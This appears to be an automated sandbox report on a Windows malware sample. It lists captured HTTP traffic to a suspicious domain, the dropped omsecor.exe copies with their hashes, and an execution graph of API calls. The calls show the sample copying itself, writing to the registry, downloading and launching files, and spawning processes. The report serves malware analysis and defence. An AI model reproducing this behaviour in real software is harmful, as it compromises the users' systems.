                                                                                                                                                                                                Cookie: snkz=173.254.250.82; btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473541|1730473447|18|6|0
                                                                                                                                                                                                Nov 1, 2024 16:06:01.423464060 CET340INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 01 Nov 2024 15:06:01 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: btst=a8f9e8f1578d1936613a47ac6d418b50|173.254.250.82|1730473561|1730473447|19|7|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:11:03:53
                                                                                                                                                                                                Start date:01/11/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\bd0wJGTae5.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\bd0wJGTae5.exe"
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:82'768 bytes
                                                                                                                                                                                                MD5 hash:CC4504807E32F91497D2C5A8DD1061F6
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                Start time:11:03:53
                                                                                                                                                                                                Start date:01/11/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:82'768 bytes
                                                                                                                                                                                                MD5 hash:DC5D106C7C04B52DF85467D6D647221A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                Start time:11:04:06
                                                                                                                                                                                                Start date:01/11/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\System32\omsecor.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:82'768 bytes
                                                                                                                                                                                                MD5 hash:1F90E0A8D463721EBCD937EF25C65D05
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:11:04:43
                                                                                                                                                                                                Start date:01/11/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\omsecor.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\omsecor.exe /nomove
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:82'768 bytes
                                                                                                                                                                                                MD5 hash:1F90E0A8D463721EBCD937EF25C65D05
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:2.3%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:11.9%
                                                                                                                                                                                                  Total number of Nodes:1140
                                                                                                                                                                                                  Total number of Limit Nodes:6
                                                                                                                                                                                                  execution_graph 6094 404ec0 6118 40821c 6094->6118 6096 404edf 6097 404f04 6096->6097 6098 404ef4 6096->6098 6101 404efd 6096->6101 6125 40c519 6097->6125 6121 404e7b 6098->6121 6102 405111 6103 40c5b9 SysFreeString 6102->6103 6103->6101 6104 4050f2 6144 40c5b9 6104->6144 6107 40c5b9 SysFreeString 6108 405103 6107->6108 6109 40c5b9 SysFreeString 6108->6109 6110 405109 6109->6110 6111 40c5b9 SysFreeString 6110->6111 6111->6102 6112 404f0b 6112->6101 6112->6102 6112->6104 6132 40c43d 6112->6132 6115 4050e2 6141 40be3a 6115->6141 6119 408220 6118->6119 6120 408233 PathCombineW 6118->6120 6119->6120 6120->6096 6122 404e93 6121->6122 6147 408248 6122->6147 6161 40c4b4 CoCreateInstance 6125->6161 6128 40c589 6128->6112 6129 40c531 VariantInit SysAllocString 6129->6128 6131 40c551 VariantClear 6129->6131 6131->6128 6163 40bf60 6132->6163 6134 4050ce 6134->6115 6137 40c00b 6134->6137 6136 40be3a HeapFree 6136->6134 6138 40c01a 6137->6138 6140 40c03b 6137->6140 6139 40bde1 3 API calls 6138->6139 6139->6140 6140->6115 6142 40be41 HeapFree 6141->6142 6143 40be53 6141->6143 6142->6143 6143->6104 6145 40c5c0 SysFreeString 6144->6145 6146 4050fb 6144->6146 6145->6146 6146->6107 6148 40821c PathCombineW 6147->6148 6149 408268 6148->6149 6150 408272 FindFirstFileW 6149->6150 6151 404eb9 6149->6151 6150->6151 6158 408292 6150->6158 6151->6101 6152 4082a2 WaitForSingleObject 6153 4083b6 FindClose 6152->6153 6152->6158 6153->6151 6154 40839e FindNextFileW 6154->6153 6154->6158 6155 408306 PathMatchSpecW 6155->6158 6156 40821c PathCombineW 6156->6158 6157 408374 Sleep 6157->6158 6158->6152 6158->6153 6158->6154 6158->6155 6158->6156 6158->6157 6159 40833f Sleep 6158->6159 6160 408248 PathCombineW 6158->6160 6159->6158 6160->6158 6162 40c4dd 6161->6162 6162->6128 6162->6129 6165 40bf72 6163->6165 6164 40bfbf 6164->6134 6164->6136 6165->6164 6167 40bfa7 wvnsprintfW 6165->6167 6168 40bde1 6165->6168 6167->6165 6169 40bdf2 6168->6169 6170 40bde5 6168->6170 6172 40be0c HeapReAlloc 6169->6172 6173 40bdfc HeapAlloc 6169->6173 6171 40be3a HeapFree 6170->6171 6174 40bdec 6171->6174 6172->6174 6173->6174 6174->6165 6805 409402 6806 409415 6805->6806 6807 409419 6806->6807 6808 409437 SysFreeString 6806->6808 6808->6807 6809 409883 6810 409890 6809->6810 6811 409655 __VEC_memcpy 6810->6811 6812 4098ad 6811->6812 6813 409655 __VEC_memcpy 6812->6813 6814 4098c7 6812->6814 6813->6814 6175 409445 6177 40945a 6175->6177 6176 40945e 6177->6176 6178 4094a0 SysFreeString SysFreeString 6177->6178 6178->6176 5690 40b346 5735 40d5b0 5690->5735 5693 40b37e 5719 40b3db 5693->5719 5782 40ac20 RegOpenKeyExW 5693->5782 5697 40b394 GetModuleFileNameW 5790 4069fd RegCreateKeyExW 5697->5790 5702 40b3f2 Sleep 5705 40a786 35 API calls 5702->5705 5703 40b3c5 5794 40a786 5703->5794 5704 40b3ca GetLastError 5704->5703 5707 40b407 GetModuleFileNameW 5705->5707 5710 40ac20 4 API calls 5707->5710 5709 40b45c 5711 40ac20 4 API calls 5709->5711 5720 40b3d8 5710->5720 5713 40b468 5711->5713 5717 407727 54 API calls 5713->5717 5714 40b426 CopyFileW 5718 40b43f 5714->5718 5714->5719 5715 40b4b9 ExpandEnvironmentStringsW 5715->5719 5716 40b4cf GetModuleFileNameW 5716->5720 5721 40b474 5717->5721 5722 4077f0 CreateProcessW 5718->5722 5719->5702 5719->5709 5719->5715 5719->5716 5729 40b44c ExitProcess 5719->5729 5730 40b4fe GetLastError 5719->5730 5737 40b2ce OleInitialize 5719->5737 5746 40aafd 5719->5746 5755 40ab7c GetModuleFileNameW CharLowerW 5719->5755 5760 40abd9 5719->5760 5766 407727 5719->5766 5779 4077f0 5719->5779 5720->5714 5720->5719 5724 40b498 GetLastError 5721->5724 5725 40b47a 5721->5725 5726 40b44b 5722->5726 5728 40b4a3 5724->5728 5727 4077f0 CreateProcessW 5725->5727 5726->5729 5731 40b486 5727->5731 5732 40a786 35 API calls 5728->5732 5733 40a786 35 API calls 5730->5733 5731->5729 5734 40b48b GetLastError 5731->5734 5732->5726 5733->5720 5734->5728 5736 40b353 GetModuleFileNameW 5735->5736 5736->5693 5739 40b2e2 5737->5739 5741 40b325 InternetCloseHandle 5739->5741 5810 407552 5739->5810 5813 407362 CreateWaitableTimerW GetLocalTime GetLocalTime GetTimeZoneInformation 5739->5813 5818 40ac93 5739->5818 5835 40b096 5739->5835 5871 40a6c9 5741->5871 5747 40d5b0 5746->5747 5748 40ab0a GetCommandLineW 5747->5748 5749 40ab1a 5748->5749 5750 40ab1f 5749->5750 5751 40ac20 4 API calls 5749->5751 5750->5719 5752 40ab30 5751->5752 5752->5750 5753 40ab35 GetModuleFileNameW CharLowerW CharLowerW 5752->5753 5754 40ab73 5753->5754 5754->5750 5756 40abb6 5755->5756 5757 40abc0 GetCommandLineW 5756->5757 5758 40abbb 5756->5758 5759 40abd0 5757->5759 5758->5719 5759->5719 5761 40ac20 4 API calls 5760->5761 5762 40abf2 5761->5762 5763 40abf7 FindFirstFileW 5762->5763 5764 40ac1a 5762->5764 5763->5764 5765 40ac0e FindClose 5763->5765 5764->5719 5765->5764 5767 40d5b0 5766->5767 5768 407731 GetModuleFileNameW 5767->5768 5769 407753 5768->5769 5770 40776d 5768->5770 5771 4075d4 15 API calls 5769->5771 5772 407774 ExpandEnvironmentStringsW 5770->5772 5773 407764 5770->5773 5775 4077a7 GetLastError 5770->5775 5777 4077bc GetLastError 5770->5777 5771->5773 6080 4075d4 CreateFileW 5772->6080 5773->5719 5776 4077ca 5775->5776 5776->5770 5778 40a786 35 API calls 5776->5778 5777->5776 5778->5776 6090 40d530 5779->6090 5781 407805 CreateProcessW 5781->5719 5783 40ac60 RegOpenKeyExW 5782->5783 5784 40ac4a 5782->5784 5786 40ac7c 5783->5786 5789 40ac78 5783->5789 6092 4069c0 RegQueryValueExW RegCloseKey 5784->6092 6093 4069c0 RegQueryValueExW RegCloseKey 5786->6093 5787 40ac5a 5787->5783 5787->5789 5789->5697 5789->5719 5791 406a30 5790->5791 5792 406a2c 5790->5792 5793 406a39 RegSetValueExW RegCloseKey 5791->5793 5792->5703 5792->5704 5793->5792 5796 40a79c 5794->5796 5798 40a7b3 5794->5798 5795 406d14 2 API calls 5795->5796 5796->5795 5797 40a79e Sleep 5796->5797 5796->5798 5797->5796 5799 406cb5 GetVersionExW 5798->5799 5800 40a83f 5799->5800 5801 4078cb 12 API calls 5800->5801 5802 40a873 5801->5802 5803 40a718 5 API calls 5802->5803 5807 40a87b 5803->5807 5804 40a744 5 API calls 5804->5807 5805 40a894 Sleep 5805->5807 5806 406e69 22 API calls 5806->5807 5807->5804 5807->5805 5807->5806 5808 40a8c7 Sleep 5807->5808 5809 40a8e1 GetProcessHeap HeapFree 5807->5809 5808->5807 5809->5720 5875 40584d 5810->5875 5812 407557 Sleep 5812->5739 5814 4073dd SystemTimeToFileTime SystemTimeToFileTime 5813->5814 5816 407432 5814->5816 5817 40745f SetWaitableTimer WaitForSingleObject CloseHandle 5816->5817 5817->5739 5876 406d14 InternetAttemptConnect 5818->5876 5820 40aca4 5821 40aca9 Sleep 5820->5821 5822 40acbd 5820->5822 5824 406d14 2 API calls 5821->5824 5879 4078cb 5822->5879 5824->5820 5825 40acd4 5886 406cb5 GetVersionExW 5825->5886 5827 40ad09 5888 40a718 5827->5888 5830 40ad71 Sleep 5834 40ad4c 5830->5834 5832 40ad9f Sleep 5832->5834 5833 40adbc 5833->5739 5834->5830 5834->5832 5834->5833 5892 40a744 5834->5892 5896 406e69 5834->5896 5836 40b0a3 5835->5836 5837 40b0bd 5836->5837 5838 40b0cf 5836->5838 5865 40b0ae 5836->5865 6000 407995 5837->6000 6007 407951 5838->6007 5841 40b177 InternetClearAllPerSiteCookieDecisions 5844 40b17d 5841->5844 5842 40b168 InternetSetPerSiteCookieDecisionW 5842->5844 5843 40b0cd 5845 40b0fb GetModuleFileNameW 5843->5845 5857 40b155 5843->5857 6028 4032b8 5844->6028 5847 40b116 GetCurrentDirectoryW 5845->5847 5851 40b10d 5845->5851 5847->5851 5849 40b186 GetLastError 5852 40a786 35 API calls 5849->5852 5850 40b196 5853 40b1b0 CreateThread 5850->5853 5854 40b1e1 5850->5854 6012 40253c 5851->6012 5852->5850 5853->5850 5856 40b221 5854->5856 5858 40a786 35 API calls 5854->5858 5860 40b228 CloseHandle 5856->5860 5861 40b23d 5856->5861 5857->5841 5857->5842 5857->5865 5859 40b1f7 5858->5859 5859->5856 5864 40b212 WaitForMultipleObjects 5859->5864 5860->5860 5860->5861 5862 40a6c9 InternetCloseHandle 5861->5862 5863 40b242 InternetClearAllPerSiteCookieDecisions 5862->5863 5863->5865 5866 40b24d 5863->5866 5864->5856 5865->5739 5866->5865 5867 40b261 GetModuleFileNameW 5866->5867 5868 40b27c GetCurrentDirectoryW 5867->5868 5869 40b273 5867->5869 5868->5869 5870 40253c 50 API calls 5869->5870 5870->5865 5872 40a6cf 5871->5872 5873 40a6fc InternetCloseHandle 5872->5873 5874 40a716 ExitProcess 5872->5874 5873->5872 5875->5812 5877 406d22 5876->5877 5878 406d26 InternetOpenW 5876->5878 5877->5820 5878->5820 5908 407e2b 5879->5908 5881 4078dd 5885 407900 5881->5885 5914 40782a GetModuleFileNameW CreateFileW 5881->5914 5883 4078ec 5883->5885 5918 407d61 5883->5918 5885->5825 5887 406cf6 5886->5887 5887->5827 5889 40a722 5888->5889 5890 40a739 5889->5890 5930 4079ff 5889->5930 5890->5834 5893 40a75d 5892->5893 5894 4079ff 5 API calls 5893->5894 5895 40a76e 5893->5895 5894->5895 5895->5834 5897 40d5b0 5896->5897 5898 406e76 GetTickCount 5897->5898 5899 406e92 5898->5899 5936 407b4e 5899->5936 5901 406f49 5945 409c99 5901->5945 5905 407017 5905->5834 5906 406ff4 5906->5905 5961 407a3c 5906->5961 5909 407e3d 5908->5909 5910 407e4e SetFilePointer ReadFile 5908->5910 5924 407cd7 5909->5924 5913 407e7e 5910->5913 5912 407e44 5912->5910 5912->5913 5913->5881 5913->5913 5915 407871 GetFileTime CloseHandle 5914->5915 5916 407888 GetTickCount 5914->5916 5917 407893 5915->5917 5916->5917 5917->5883 5919 407d70 5918->5919 5922 407d77 5918->5922 5920 407cd7 3 API calls 5919->5920 5920->5922 5921 407d81 5921->5885 5922->5921 5923 407dfa SetFilePointer WriteFile 5922->5923 5923->5885 5925 40d5b0 5924->5925 5926 407ce4 GetModuleFileNameW 5925->5926 5927 407d0d GetCurrentDirectoryW 5926->5927 5928 407d00 5926->5928 5927->5928 5929 407d36 CreateFileW 5928->5929 5929->5912 5933 407908 5930->5933 5932 407a05 5932->5889 5934 407e2b 5 API calls 5933->5934 5935 407919 5934->5935 5935->5932 5971 407267 5936->5971 5938 407b63 5939 407e2b 5 API calls 5938->5939 5940 407b83 5938->5940 5939->5940 5940->5940 5941 407c6b 5940->5941 5976 40bcb4 5940->5976 5986 40bd55 5941->5986 5946 409ca6 5945->5946 5947 409cbb InternetOpenUrlW 5946->5947 5948 409cdf GetProcessHeap HeapAlloc 5947->5948 5949 406fe2 5947->5949 5948->5949 5950 409d5b InternetReadFile 5948->5950 5949->5905 5957 406e00 5949->5957 5951 409d79 GetProcessHeap HeapAlloc 5950->5951 5952 409d0b 5950->5952 5955 409d92 GetProcessHeap HeapFree 5951->5955 5952->5950 5952->5951 5953 409d1f GetProcessHeap HeapReAlloc 5952->5953 5956 40c5d0 __VEC_memcpy 5952->5956 5953->5949 5953->5952 5955->5949 5956->5952 5958 406e12 5957->5958 5959 40c5d0 __VEC_memcpy 5958->5959 5960 406e21 5959->5960 5960->5906 5962 407a4f 5961->5962 5963 40c5d0 __VEC_memcpy 5962->5963 5970 407b42 5962->5970 5964 407a7d 5963->5964 5965 407267 3 API calls 5964->5965 5964->5970 5966 407b17 5965->5966 5967 407267 3 API calls 5966->5967 5968 407b20 5967->5968 5969 407d61 5 API calls 5968->5969 5969->5970 5970->5905 5972 407284 5971->5972 5973 407278 GetSystemTime 5971->5973 5974 40728b SystemTimeToFileTime SystemTimeToFileTime 5972->5974 5973->5974 5975 4072e8 __aulldiv 5974->5975 5975->5938 5977 40bcd3 5976->5977 5985 40bd17 5977->5985 5992 40c5d0 5977->5992 5978 40bd3a 5979 40bd4d 5978->5979 5980 40c5d0 __VEC_memcpy 5978->5980 5979->5941 5980->5979 5982 40b51c __VEC_memcpy 5982->5985 5985->5978 5985->5982 5987 40bd5c 5986->5987 5987->5987 5988 40bd9e 5987->5988 5989 40bcb4 __VEC_memcpy 5987->5989 5990 40bcb4 __VEC_memcpy 5988->5990 5989->5988 5991 407c7c 5990->5991 5991->5901 5993 40c5e8 5992->5993 5994 40c60f __VEC_memcpy 5993->5994 5995 40bcf9 5993->5995 5994->5995 5995->5979 5996 40b51c 5995->5996 5997 40b543 5996->5997 5998 40b552 5996->5998 5999 40c5d0 __VEC_memcpy 5997->5999 5998->5985 5999->5998 6006 4079a2 6000->6006 6001 4079f1 6002 407951 36 API calls 6001->6002 6003 4079fc 6002->6003 6003->5843 6004 407e2b 5 API calls 6004->6006 6006->6001 6006->6004 6035 40791c 6006->6035 6009 407965 6007->6009 6008 407e2b 5 API calls 6008->6009 6009->6008 6010 40798e 6009->6010 6011 40791c 36 API calls 6009->6011 6010->5843 6011->6009 6014 402549 6012->6014 6013 402572 6015 402584 DeleteFileW 6013->6015 6018 40a786 35 API calls 6013->6018 6014->6013 6017 406d14 2 API calls 6014->6017 6021 402561 Sleep 6014->6021 6016 402594 6015->6016 6026 4025ba 6015->6026 6022 4025ad Sleep 6016->6022 6023 4025c1 6016->6023 6041 407036 DeleteFileW CreateFileW 6016->6041 6017->6014 6020 402581 6018->6020 6020->6015 6021->6014 6022->6016 6022->6026 6024 40a786 35 API calls 6023->6024 6027 4025d0 _memset 6023->6027 6024->6027 6025 402630 CreateProcessW 6025->6026 6026->5857 6027->6025 6052 406a68 RegOpenKeyExW 6028->6052 6033 403351 GetProcAddress GetProcAddress GetProcAddress 6034 403386 6033->6034 6034->5849 6034->5850 6036 407d61 5 API calls 6035->6036 6037 407930 6036->6037 6038 407939 GetLastError 6037->6038 6039 407949 6037->6039 6040 40a786 35 API calls 6038->6040 6039->6006 6040->6039 6042 407078 GetLastError 6041->6042 6048 40706b 6041->6048 6043 407095 InternetOpenUrlW 6042->6043 6044 407089 SetEndOfFile 6042->6044 6045 4070c6 InternetQueryDataAvailable 6043->6045 6046 4070b8 CloseHandle 6043->6046 6044->6043 6047 407119 InternetReadFile 6045->6047 6046->6048 6049 407123 CloseHandle InternetCloseHandle 6047->6049 6050 4070ed 6047->6050 6048->6016 6049->6048 6050->6049 6051 4070f2 WriteFile 6050->6051 6051->6047 6053 406a9a 6052->6053 6057 4032c4 6052->6057 6076 4069c0 RegQueryValueExW RegCloseKey 6053->6076 6055 406aaa 6056 4069fd 3 API calls 6055->6056 6055->6057 6056->6057 6058 406adf 6057->6058 6059 406aec 6058->6059 6060 406b11 RegOpenKeyExW 6059->6060 6061 406b34 6060->6061 6074 4032ce 6 API calls 6060->6074 6077 4069c0 RegQueryValueExW RegCloseKey 6061->6077 6063 406b49 6064 406b78 RegOpenKeyExW 6063->6064 6063->6074 6065 406b96 6064->6065 6066 406ba6 6064->6066 6078 4069c0 RegQueryValueExW RegCloseKey 6065->6078 6068 4069fd 3 API calls 6066->6068 6069 406bc3 6066->6069 6068->6069 6070 406c03 RegOpenKeyExW 6069->6070 6069->6074 6071 406c21 6070->6071 6075 406c31 6070->6075 6079 4069c0 RegQueryValueExW RegCloseKey 6071->6079 6073 4069fd 3 API calls 6073->6074 6074->6033 6074->6034 6075->6073 6075->6074 6076->6055 6077->6063 6078->6066 6079->6075 6081 40760a CreateFileW 6080->6081 6082 407622 6080->6082 6081->6082 6083 40762a GetFileSize GetProcessHeap RtlAllocateHeap 6081->6083 6082->5770 6083->6082 6084 407650 ReadFile 6083->6084 6084->6082 6085 40766a 6084->6085 6085->6082 6086 407673 WriteFile SetFilePointer ReadFile SetFilePointer ReadFile 6085->6086 6089 40584d 6086->6089 6088 4076cc SetFilePointer WriteFile CloseHandle CloseHandle 6088->6082 6089->6088 6091 40d53c __VEC_memzero 6090->6091 6091->5781 6092->5787 6093->5789 6815 401006 6816 40101f 6815->6816 6817 407499 5 API calls 6816->6817 6820 4010c1 6816->6820 6818 4010ce 6817->6818 6819 407552 Sleep 6818->6819 6818->6820 6819->6820 6821 409a07 6824 409a14 6821->6824 6822 409a92 6823 409a6d SysAllocString 6823->6822 6824->6822 6824->6823 6825 403287 6826 403292 6825->6826 6827 4032aa 6825->6827 6826->6827 6829 408604 RegOpenKeyExW 6826->6829 6830 408632 6829->6830 6831 40864a GetLastError 6829->6831 6839 4069c0 RegQueryValueExW RegCloseKey 6830->6839 6833 408654 6831->6833 6834 408658 6831->6834 6833->6826 6836 408682 DeleteFileW 6834->6836 6837 40866a 6834->6837 6835 408646 6835->6831 6836->6833 6838 4069fd 3 API calls 6837->6838 6838->6833 6839->6835 6840 40ce08 6841 40ce1a 6840->6841 6843 40ce28 @_EH4_CallFilterFunc@8 6840->6843 6842 40cd66 __except_handler4 5 API calls 6841->6842 6842->6843 6844 409909 6845 409916 6844->6845 6852 409723 6845->6852 6847 409723 __VEC_memcpy 6848 4099d5 6847->6848 6849 409a02 6848->6849 6850 4099de SysAllocString SysAllocString 6848->6850 6850->6849 6851 409934 6851->6847 6851->6849 6854 409733 6852->6854 6853 409772 6853->6851 6854->6853 6855 40c5d0 __VEC_memcpy 6854->6855 6855->6853 6179 4047cc 6180 40821c PathCombineW 6179->6180 6181 4047f1 6180->6181 6182 40483b 6181->6182 6183 404800 6181->6183 6184 404843 6181->6184 6187 408248 8 API calls 6183->6187 6203 4083c4 CreateFileW 6184->6203 6187->6182 6190 404a61 6192 404a79 6190->6192 6193 404a69 VirtualFree 6190->6193 6191 40487b HeapAlloc 6195 404896 6191->6195 6192->6182 6194 404a7f CloseHandle 6192->6194 6193->6192 6194->6182 6195->6195 6196 404a4a 6195->6196 6200 40490c StrStrIA StrStrIA StrStrIA StrStrIA 6195->6200 6202 40c00b 3 API calls 6195->6202 6219 40c3f9 6195->6219 6197 40be3a HeapFree 6196->6197 6198 404a53 6197->6198 6224 40be54 6198->6224 6200->6195 6202->6195 6204 4083ea GetFileSizeEx 6203->6204 6207 404854 6203->6207 6205 4083f9 6204->6205 6206 40844f CloseHandle 6204->6206 6205->6206 6205->6207 6208 40840e VirtualAlloc 6205->6208 6206->6207 6207->6182 6212 40c290 6207->6212 6208->6206 6209 408423 ReadFile 6208->6209 6210 408441 VirtualFree 6209->6210 6211 408439 6209->6211 6210->6206 6211->6207 6211->6210 6217 40c2b6 6212->6217 6218 40486e 6212->6218 6213 40bde1 3 API calls 6213->6217 6214 40c340 6215 40be54 HeapFree 6214->6215 6215->6218 6217->6213 6217->6214 6217->6218 6230 40c05c 6217->6230 6218->6190 6218->6191 6220 40c402 6219->6220 6221 40c407 6219->6221 6220->6195 6222 40c412 wvnsprintfW 6221->6222 6223 40c42e 6222->6223 6223->6195 6226 40be5b 6224->6226 6229 40be73 6224->6229 6225 40be3a HeapFree 6225->6226 6226->6225 6227 40be6d 6226->6227 6226->6229 6228 40be3a HeapFree 6227->6228 6228->6229 6229->6190 6231 40c066 6230->6231 6232 40c06a 6230->6232 6231->6217 6232->6231 6235 40be27 HeapAlloc 6232->6235 6234 40c086 6234->6217 6235->6234 6856 402d0e 6857 40267a 122 API calls 6856->6857 6858 402d32 6857->6858 6861 409c6f 6858->6861 6862 402d3a 6861->6862 6863 409c7a SysFreeString 6861->6863 6863->6862 6863->6863 6864 40350f 6865 40821c PathCombineW 6864->6865 6866 403531 6865->6866 6867 403540 6866->6867 6868 403553 HeapAlloc 6866->6868 6871 40354d 6866->6871 6869 4034a8 8 API calls 6867->6869 6870 403576 GetPrivateProfileStringW 6868->6870 6868->6871 6869->6871 6872 403594 6870->6872 6873 40372c 6870->6873 6872->6873 6875 4035a8 HeapAlloc 6872->6875 6874 40be3a HeapFree 6873->6874 6874->6871 6875->6873 6882 4035c5 6875->6882 6876 403627 GetPrivateProfileStringW 6877 403643 GetPrivateProfileIntW 6876->6877 6876->6882 6878 403669 GetPrivateProfileStringW 6877->6878 6877->6882 6879 40368b GetPrivateProfileStringW 6878->6879 6878->6882 6879->6882 6880 403723 6881 40be3a HeapFree 6880->6881 6881->6873 6882->6876 6882->6880 6883 40c3f9 wvnsprintfW 6882->6883 6884 40c00b 3 API calls 6882->6884 6883->6882 6884->6882 6236 40cbd0 6237 40cc08 6236->6237 6238 40cbfb 6236->6238 6240 40cd66 __except_handler4 5 API calls 6237->6240 6254 40cd66 6238->6254 6241 40cc18 __except_handler4 6240->6241 6242 40cc74 __except_handler4 6241->6242 6243 40cc9f 6241->6243 6249 40ccb5 _CallDestructExceptionObject 6241->6249 6242->6243 6244 40cc8f 6242->6244 6245 40cd66 __except_handler4 5 API calls 6242->6245 6246 40cd66 __except_handler4 5 API calls 6244->6246 6245->6244 6246->6243 6248 40ccf4 __except_handler4 6250 40cd2b 6248->6250 6251 40cd66 __except_handler4 5 API calls 6248->6251 6262 40ce9a RtlUnwind 6249->6262 6252 40cd66 __except_handler4 5 API calls 6250->6252 6251->6250 6253 40cd3b __except_handler3 6252->6253 6255 40cd70 IsDebuggerPresent 6254->6255 6256 40cd6e 6254->6256 6264 40d247 6255->6264 6256->6237 6259 40d0d6 SetUnhandledExceptionFilter UnhandledExceptionFilter 6260 40d0f3 __except_handler4 6259->6260 6261 40d0fb GetCurrentProcess TerminateProcess 6259->6261 6260->6261 6261->6237 6263 40ceaf 6262->6263 6263->6248 6264->6259 6891 40d990 6892 40d993 VirtualQuery 6891->6892 6894 40d9b2 6892->6894 6896 40d7d1 _ValidateScopeTableHandlers __except_handler3 __FindPESection 6892->6896 6895 40d9cc GetVersionExA 6894->6895 6894->6896 6895->6896 6265 401652 6266 401665 6265->6266 6270 4016f6 6266->6270 6271 407499 GetLocalTime GetLocalTime GetTimeZoneInformation SystemTimeToFileTime SystemTimeToFileTime 6266->6271 6268 4016da 6269 407552 Sleep 6268->6269 6268->6270 6269->6270 6272 40754f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6271->6272 6272->6268 6897 402214 6901 402233 6897->6901 6898 402386 6899 402319 6899->6898 6905 401c41 6899->6905 6901->6899 6902 408091 3 API calls 6901->6902 6902->6899 6903 402478 6903->6898 6904 408091 3 API calls 6903->6904 6904->6898 6910 401c4e 6905->6910 6906 401e07 6909 407267 3 API calls 6906->6909 6911 401d15 6906->6911 6907 401d0e 6908 407267 3 API calls 6907->6908 6908->6911 6909->6911 6910->6906 6910->6907 6911->6903 6273 402dd5 6276 40267a 6273->6276 6282 40268a 6276->6282 6277 4027dd 6278 4026ee GetTickCount 6278->6282 6281 407552 Sleep 6281->6282 6282->6277 6282->6278 6282->6281 6283 4027e6 OleInitialize 6282->6283 6344 40a8f9 6282->6344 6361 40a469 6283->6361 6285 402806 6293 40280b 6285->6293 6368 40a345 6285->6368 6288 402851 6374 40a65e 6288->6374 6289 40285f 6291 40286e 6289->6291 6377 4072ed GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 6289->6377 6379 409f2b 6291->6379 6293->6282 6295 402884 6296 4028b4 6295->6296 6301 402943 6295->6301 6387 408f26 6295->6387 6299 408f26 10 API calls 6296->6299 6296->6301 6298 402c20 6300 40a65e Sleep 6298->6300 6302 4028ea 6299->6302 6300->6293 6301->6298 6308 4029aa 6301->6308 6412 4089fd 6301->6412 6304 4028f1 6302->6304 6305 402956 6302->6305 6303 4029e6 6306 402a3b 6303->6306 6421 40920a 6303->6421 6311 402904 SysAllocString 6304->6311 6309 40a65e Sleep 6305->6309 6312 402a6f 6306->6312 6317 408f26 10 API calls 6306->6317 6308->6303 6313 4089fd 5 API calls 6308->6313 6309->6301 6315 402927 SysFreeString 6311->6315 6316 40293a 6311->6316 6318 402aa2 6312->6318 6322 408f26 10 API calls 6312->6322 6313->6303 6314 402a17 6426 409c49 6314->6426 6315->6315 6315->6316 6316->6301 6406 4091bd 6316->6406 6321 402a62 SysAllocString 6317->6321 6319 402ad1 6318->6319 6323 408f26 10 API calls 6318->6323 6324 402b04 6319->6324 6329 408f26 10 API calls 6319->6329 6321->6312 6327 402a95 SysAllocString 6322->6327 6328 402ac4 SysAllocString 6323->6328 6330 40a65e Sleep 6324->6330 6327->6318 6328->6319 6331 402af7 SysAllocString 6329->6331 6332 402b0e 6330->6332 6331->6324 6333 409c49 SysAllocString 6332->6333 6334 402b6b 6332->6334 6333->6334 6335 409c49 SysAllocString 6334->6335 6336 402b83 6334->6336 6335->6336 6337 402be3 6336->6337 6338 402bea 6336->6338 6429 408825 6337->6429 